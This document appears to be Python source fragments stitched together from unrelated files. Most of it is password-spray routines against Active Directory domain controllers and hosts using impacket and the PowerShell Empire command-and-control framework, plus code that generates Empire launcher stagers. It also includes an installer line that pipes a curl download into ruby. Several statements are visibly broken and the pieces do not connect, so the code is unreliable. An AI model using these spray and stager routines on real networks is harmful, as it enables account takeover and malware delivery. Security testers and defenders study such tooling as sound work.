def impacket_spray_3(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True): ## Against several random hosts on the domain. Un authentication per host. if UseDomainAct: print_info("Querying for domain users with badPwdCount>=3...") try: users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers) except: print_error("Did not find enough users, try a lower Nusers value") return print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...") else: users = generate_random_users(nusers) print_info("Using " + str(len(users)) + " randomly generated usernames (mimicking local accounts) ...") print_info("Querying for domain computers that authenticated within the last day...") try: computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers) except: print_error("Did not find enough computers, try a lower Nusers value") return print_status("Obtained " + str(len(computers)) + " computers.") print_info("Identifying live hosts ...") computers = get_live_hosts(domain, computers, dc_ip) print_status("Using " + str(len(computers)) + " randomly picked domain computers for the spray...") if sleep > 0: print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...") if nusers > len(computers): users = users[:len(computers)] for idx, user in enumerate(users): smb_login(domain, user, spraypassword, computers[idx], sleep) if UseDomainAct else smb_login("", user, spraypassword, computers[idx], sleep)
def impacket_spray_1(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True, ): ## Against the DC print_info("Querying for Domain Controllers...") dcs =get_dcs(duser, dpass, domain, dc_ip) dcs = get_live_hosts(domain,dcs,dc_ip) dc = random.choice(dcs) print_status("Randomly picked DC : "+dc[0]+" - "+dc[1]) if UseDomainAct: print_info("Querying for domain users with badPwdCount>=3...") try: users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers) except: print_error("Did not find enough users, try a lower Nusers value") return print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...") if sleep > 0: print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...") smb_login(domain, users, spraypassword, dc, sleep) else: users = generate_random_users(nusers) print_info("Using "+str(len(users))+" randomly generated usernames (mimic local account usage) ...") if sleep > 0: print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...") smb_login("", users, spraypassword, dc, sleep)
def empire_spray_2(empiresession, agentid, duser, dpass, domain, dc_ip, nusers, spraypassword, sleep, UseDomainAct=True, UseKerberos=True): ## Against one random host on the domain print_info("Querying for domain computers that authenticated within the last day...") try: computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers) except: print_error("Did not find enough computers, try a lower Nusers value") return print_status("Obtained " + str(len(computers)) + " computers.") print_info("Identifying live hosts ...") computers = get_live_hosts(domain,computers,dc_ip) host = random.choice(computers) print_status("Randomly picked domain computer : " + host[0] + " - " + host[1]) computername = host[0] if UseKerberos else host[1] if UseDomainAct: print_info("Querying for domain users with badPwdCount>=3...") try: users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers) except: print_error("Did not find enough users, try a lower Nusers value") return print_status("Using " + str(len(users)) + " randomly picked domain users for the spray.") else: users = generate_random_users(nusers) print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...") usernames = [] for user in users: usernames.append(user if UseDomainAct else generate_random_users(10)[0]) usernames = ",".join(usernames) if sleep > 0: print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...") module_options = {'UserName': "******"" + usernames + "\"", 'ComputerName': computername, 'Password': spraypassword, 'Domain': domain, 'Sleep':str(sleep)} if UseDomainAct else {'UserName': "******"" + usernames + "\"", 'Domain':'', 'ComputerName': computername, 'Password': spraypassword,'Sleep':str(sleep)} results=empiresession.execute_module_with_results("powershell/situational_awareness/network/smblogin", agentid, module_options) print_status("Obtained results from the Powershell Empire agent") process_empire_results(results,host)
def empire_spray_3(empiresession, agentid, duser, dpass, domain, dc_ip, nusers, spraypassowrd, sleep, UseDomainAct=True, UseKerberos=True): ## Against several random hosts on the domain. One authentication per host. if UseDomainAct: print_info("Querying for domain users with badPwdCount>=3...") #users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers) try: users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers) except: print_error("Did not find enough users, try a lower Nusers value") return print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...") else: users = generate_random_users(nusers) print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...") print_info("Querying for domain computers that authenticated within the last day...") try: computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers) except: print_error("Did not find enough computers, try a lower Nusers value") return print_status("Obtained " + str(len(computers)) + " computers.") print_info("Identifying live hosts ...") computers=get_live_hosts(domain,computers,dc_ip) print_status("Using " + str(len(computers)) + " randomly picked domain computers for the spray...") if sleep > 0: print_status("Sleeping " + str((sleep)) + " seconds between each empire module execution...") if nusers > len(computers): users = users[:len(computers)] for idx, user in enumerate(users): duser = user if UseDomainAct else generate_random_users(1)[0] computername = computers[idx][0] if UseKerberos else computers[idx][1] module_options = {'UserName': duser, 'ComputerName': computername, 'Password': spraypassowrd, 'Domain': domain,'Sleep':'0'} if UseDomainAct else {'UserName': duser,'Domain':'', 'ComputerName': computername, 'Password': spraypassowrd,'Sleep':'0'} results = empiresession.execute_module_with_results("powershell/situational_awareness/network/smblogin", agentid, module_options) print_status("Obtained results from the Powershell Empire agent") process_empire_results(results,computers[idx]) # In thise scenario, adding the sleep here instead of Invoke-SMBLogin if sleep > 0 : time.sleep(sleep)
def login(self, host, empire_username, empire_password): payload = {'username': empire_username,'password': empire_password} headers = {'Content-Type': 'application/json'} try: r = + '/api/admin/login', json=payload, headers=headers, verify=False) if r.status_code == 200: #token['token'] = r.json()['token'] #self.token = r.json()['token'] return r.json()['token'] else: print_error ('Authentication to Empire RESTful API Failed') return # if debug: print_debug('Status Code: {} Response: {}'.format(r.status_code, r.text)) #sys.exit(1) except ConnectionError: print_error ('Connection Error. Check Empire RESTful API') return
def generate_stagers(self, listener='http'): path= os.getcwd()+'/stagers' headers = {'Content-Type': 'application/json'} launchers = ['windows/launcher_bat','windows/launcher_sct','windows/hta','windows/launcher_xml','windows/launcher_vbs'] for launcher in launchers: filename = ("/"+launcher[7:]).replace('_','.') if "hta" not in launcher else "/"+launcher.replace("windows","launcher").replace("/",".") stager_options = {'StagerName': launcher,'Listener': listener} r = + '/api/stagers', params=self.token, headers=headers, json=stager_options, verify=False) newfile = (r.json()[launcher]['Output']) try: output_file = open(path + filename, 'w') if "hta" not in launcher: newfile = base64.b64decode(newfile) output_file = open(path + filename, 'wb') output_file.write(newfile) output_file.close() except: print_error("Could not create stagers. Check permissions") print(traceback.format_exc())
def impacket_spray_2(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True): ## Against one random host on the domain print_info("Querying for domain computers that authenticated within the last day...") try: computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers) except: print_error("Did not find enough computers, try a lower Nusers value") return print_status("Obtained " + str(len(computers)) + " computers.") print_info("Identifying live hosts ...") computers=get_live_hosts(domain,computers,dc_ip) host = random.choice(computers) print_status("Randomly picked domain computer : " + host[0] + " - " + host[1]) if UseDomainAct: print_info("Querying for domain users with badPwdCount>=3...") try: users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers) except: print_error("Did not find enough users, try a lower Nusers value") return print_status("Using " + str(len(users)) + " randomly picked domain users for the spray.") if sleep > 0: print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...") smb_login(domain, users, spraypassword, host, sleep) else: users = generate_random_users(nusers) print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...") if sleep > 0: print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...") smb_login("", users, spraypassword, host, sleep)
def check_dependency(): print_status("Checking for OSX package manager...") if not os.path.isfile("/usr/local/bin/brew"): print_warning("Brew not found...") # Begin automated brew install # Check for requirements print_status("Checking for Xcode Command Line Tools...") if subprocess.Popen("xcode-select -p", shell=True).wait() != 0: print_warning("Xcode Command Line Tools not found...") print_status("Attempting install of Xcode Command Line Tools...") # Try to install Xcode tools try: if subprocess.Popen("xcode-select --install", shell=True).wait() == 0: print_status("Xcode CLI Tools installed successfully.") except: print_error("Xcode Command Line Tool install failed. Try to install manually and rerun PTF...") sys.exit() # Pre-req test passed, begin brew installation try: print_status("Beginning brew installation..") subprocess.Popen( 'ruby -e "$(curl -fsSL ""', shell=True ).wait() except: print_error("Something in the brew installtion failed. Try to install manually and rerun PTF...") sys.exit() # install caskroom try: print_status("Beginning brew caskroom installtion and configuration") subprocess.Popen("brew tap caskroom/cask", shell=True).wait() subprocess.Popen("brew install caskroom/cask/brew-cask", shell=True).wait() except: print_error( "Something in the brew caskroom installtion failed. Try to run 'brew install caskroom/cask/brew-cask' manually and rerun PTF..." ) sys.exit()
An indication that something unexpected happened, or indicative of some problem in the near future (e.g. ‘disk space low’). The software is still working as expected. ERROR Due to a more serious problem, the software has not been able to perform some function. CRITICAL A serious error, indicating that the program itself may be unable to continue running. ''' try: # Setting logging output configuration TESTING ONLY!!! ''' *************************************************** ''' # First check if the file exists, if it does emtpy the file with /dev/null if os.path.isfile("ptf-output.log"): os.system("cat /dev/null > ptf-output.log") log = logging.basicConfig(filename="ptf-output.log", level=logging.INFO) #log = logging.getLogger("PTF Basic Logger") log = info = debug = logging.debug error = logging.error critical = logging.critical ''' *************************************************** ''' except Exception as error: print_error( "Ooops! There seems to be a mistake somewhere in src.ptflogger module") print_error(error) sys.exit()